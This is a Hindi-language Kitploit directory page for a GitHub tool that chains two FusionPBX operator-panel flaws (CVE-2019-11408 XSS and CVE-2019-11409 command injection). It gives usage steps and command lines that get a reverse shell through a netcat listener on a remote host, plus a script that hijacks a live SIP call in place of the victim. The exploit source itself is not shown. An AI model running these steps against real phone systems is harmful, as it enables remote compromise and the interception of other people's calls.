Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
fusionpbx_rce_vulnerability — श्रृंखला CVE-2019-11408 – ऑपरेटर पैनल में XSS और CVE-2019-11409 – ऑपरेटर पैनल में Command injection. | Kitploit
उपकरण/GitHubGitHub/hoseynheydari/fusionpbx_rce_vulnerability
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubhoseynheydari/fusionpbx_rce_vulnerability

fusionpbx_rce_vulnerability

श्रृंखला CVE-2019-11408 – ऑपरेटर पैनल में XSS और CVE-2019-11409 – ऑपरेटर पैनल में Command injection.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

प्रस्तावना

यह सरल कोड डस्टिन कॉब द्वारा RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX में प्रस्तुत श्रृंखलित भेद्यता के कार्यान्वयन को पूरा करने का प्रयास करता है।

RCE

पुनरुत्पादन चरण

  1. वेब ब्राउज़र में भेद्य ऑपरेटर स्क्रीन देखें, जो इस उदाहरण में https://{fusionpbx_address}/app/operator_panel/index.php पर स्थित है।
  2. एक दूरस्थ सिस्टम (rce_listener_address) पर netcat लिसनर शुरू करें।
  3. दूरस्थ सिस्टम पर दूसरे टर्मिनल विंडो में नीचे दिए गए एक्सप्लॉइट कोड को चलाएँ: python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}
  4. एक्सप्लॉइट netcat लिसनर से कनेक्ट होगा और एक रिवर्स शेल प्रदान करेगा।

कॉल को बदलना

जब हम किसी कॉल से Call-ID, from-tag और to-tag जानते हैं, तो नीचे दिए गए कोड को चलाने से आप कॉल में पीड़ित के स्थान पर आ जाएंगे।

पुनरुत्पादन चरण

  1. पहले दो SIP UA के बीच एक कॉल शुरू करें।
  2. कॉल स्थापित होने के बाद हमें {Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag} को जोड़कर dialog_identifier बनाना होगा।
  3. दूरस्थ सिस्टम पर नीचे दिए गए हाईजैकर कोड को चलाएँ और अपने नंबर को पीड़ित संख्या से बदलें: python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}
टूल डाउनलोड करें